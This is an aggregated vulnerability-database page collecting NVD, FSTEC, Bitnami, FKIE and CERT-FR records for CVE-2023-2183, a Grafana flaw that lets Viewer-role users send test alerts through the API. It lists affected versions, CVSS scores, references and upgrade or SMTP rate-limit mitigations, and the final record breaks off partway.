"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.4.12",
"versionStartIncluding": "9.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.3.15",
"versionStartIncluding": "9.3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.2.19",
"versionStartIncluding": "9.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.5.26",
"versionStartIncluding": "8.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-2183"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-862"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2023-2183/",
"refsource": "MISC",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"name": "https://security.netapp.com/advisory/ntap-20230706-0002/",
"refsource": "MISC",
"tags": [],
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 2.7
}
},
"lastModifiedDate": "2023-07-06T19:15Z",
"publishedDate": "2023-06-06T19:15Z"
}
}
}
CVE-2023-2183
Vulnerability from fstec - Published: 19.04.2023
VLAI Severity ?
Title
Уязвимость программного интерфейса веб-инструмента представления данных Grafana, позволяющая нарушителю повысить свои привилегии и проводить фишинг-атаки
Description
Уязвимость программного интерфейса веб-инструмента представления данных Grafana связана с недостатками разграничения доступа при обработке конечных точек. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, повысить свои привилегии и проводить фишинг-атаки путем отправки специально созданных e-mail сообщений
Severity ?
Vendor
ООО «Ред Софт», Grafana Labs
Software Name
РЕД ОС (запись в едином реестре российских программ №3751), Grafana
Software Version
7.3 (РЕД ОС), от 9.5.0 до 9.5.3 (Grafana), от 9.4.0 до 9.4.12 (Grafana), от 9.3.0 до 9.3.15 (Grafana), от 9.2.0 до 9.2.19 (Grafana), до 8.5.26 (Grafana)
Possible Mitigations
Использование рекомендаций:
Для Grafana:
https://grafana.com/security/security-advisories/cve-2023-2183/
Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
Компенсирующие меры:
1. В настройках конфигурации SMTP-сервера следует установить ограничения при отправке e-mail сообщений на один и тот же электронный адрес в единицу времени;
2. Следует разграничить права при управлении доступом на основе ролей при обработке конечных точек.
Reference
https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3
https://grafana.com/security/security-advisories/cve-2023-2183/
http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
CWE
CWE-284
{
"CVSS 2.0": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"CVSS 3.0": "AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Grafana Labs",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u043e\u0442 9.5.0 \u0434\u043e 9.5.3 (Grafana), \u043e\u0442 9.4.0 \u0434\u043e 9.4.12 (Grafana), \u043e\u0442 9.3.0 \u0434\u043e 9.3.15 (Grafana), \u043e\u0442 9.2.0 \u0434\u043e 9.2.19 (Grafana), \u0434\u043e 8.5.26 (Grafana)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Grafana:\nhttps://grafana.com/security/security-advisories/cve-2023-2183/\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n1. \u0412 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0435 e-mail \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u043d\u0430 \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0432 \u0435\u0434\u0438\u043d\u0438\u0446\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438;\n2. \u0421\u043b\u0435\u0434\u0443\u0435\u0442 \u0440\u0430\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u043f\u0440\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0440\u043e\u043b\u0435\u0439 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u0435\u043a.",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "19.04.2023",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "13.09.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "16.06.2023",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2023-03205",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-2183",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Grafana",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751)",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433-\u0430\u0442\u0430\u043a\u0438",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (CWE-284)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u0435\u043a. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433-\u0430\u0442\u0430\u043a\u0438 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 e-mail \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438, \u0417\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u043e\u043c",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3 \nhttps://grafana.com/security/security-advisories/cve-2023-2183/\nhttp://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-284",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 4,1)"
}
bit-grafana-2023-2183
Vulnerability from bitnami_vulndb
Published
2024-03-06 10:53
Modified
2025-04-03 14:40
Summary
Details
Grafana is an open-source platform for monitoring and observability.
The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.
This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.
Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "grafana",
"purl": "pkg:bitnami/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.5.26"
},
{
"introduced": "9.0.0"
},
{
"fixed": "9.2.19"
},
{
"introduced": "9.3.0"
},
{
"fixed": "9.3.15"
},
{
"introduced": "9.4.0"
},
{
"fixed": "9.4.12"
},
{
"introduced": "9.5.0"
},
{
"fixed": "9.5.3"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2023-2183"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*"
],
"severity": "Medium"
},
"details": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.",
"id": "BIT-grafana-2023-2183",
"modified": "2025-04-03T14:40:37.652Z",
"published": "2024-03-06T10:53:35.301Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183"
}
],
"schema_version": "1.5.0"
}
FKIE_CVE-2023-2183
Vulnerability from fkie_nvd - Published: 2023-06-06 19:15 - Updated: 2025-02-13 17:16
Severity ?
4.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
6.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
6.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Summary
Grafana is an open-source platform for monitoring and observability.
The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.
This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.
Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "48AB6EAA-1211-4E49-938E-7A6C57914A5B",
"versionEndExcluding": "8.5.26",
"versionStartIncluding": "8.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60ED286C-003F-4D81-B26C-8B39A33B1327",
"versionEndExcluding": "9.2.19",
"versionStartIncluding": "9.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C45A8C03-0871-4F08-8285-EA8EF5B91132",
"versionEndExcluding": "9.3.15",
"versionStartIncluding": "9.3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7E1DC65-AEE9-4296-98A8-B0F8C0794B39",
"versionEndExcluding": "9.4.12",
"versionStartIncluding": "9.4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "109E940E-B6B4-4E5A-A580-C58A26CD4392",
"versionEndExcluding": "9.5.3",
"versionStartIncluding": "9.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix."
}
],
"evaluatorComment": "Impact ",
"id": "CVE-2023-2183",
"lastModified": "2025-02-13T17:16:19.957",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 1.4,
"source": "security@grafana.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-06-06T19:15:11.277",
"references": [
{
"source": "security@grafana.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"source": "security@grafana.com",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"source": "security@grafana.com",
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "security@grafana.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-862"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CERTFR-2023-AVI-0497
Vulnerability from certfr_avis - Published: 2023-06-29 - Updated: 2023-06-29
De multiples vulnérabilités ont été découvertes dans Grafana. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité et un déni de service à distance.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Grafana Labs | Grafana | Grafana versions 10.0.x antérieures à 10.0.1 | ||
| Grafana Labs | Grafana | Grafana versions 9.3.x antérieures à 9.3.16 | ||
| Grafana Labs | Grafana | Grafana versions 9.x antérieures à 9.2.20 | ||
| Grafana Labs | Grafana | Grafana versions antérieures à 8.5.27 | ||
| Grafana Labs | Grafana | Grafana versions 9.5.x antérieures à 9.5.5 | ||
| Grafana Labs | Grafana | Grafana versions 9.4.x antérieures à 9.4.13 |
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Grafana versions 10.0.x ant\u00e9rieures \u00e0 10.0.1",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.3.x ant\u00e9rieures \u00e0 9.3.16",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.x ant\u00e9rieures \u00e0 9.2.20",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions ant\u00e9rieures \u00e0 8.5.27",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.5.x ant\u00e9rieures \u00e0 9.5.5",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 9.4.x ant\u00e9rieures \u00e0 9.4.13",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-3128",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3128"
},
{
"name": "CVE-2023-2801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2801"
},
{
"name": "CVE-2023-2183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2183"
}
],
"initial_release_date": "2023-06-29T00:00:00",
"last_revision_date": "2023-06-29T00:00:00",
"links": [],
"reference": "CERTFR-2023-AVI-0497",
"revisions": [
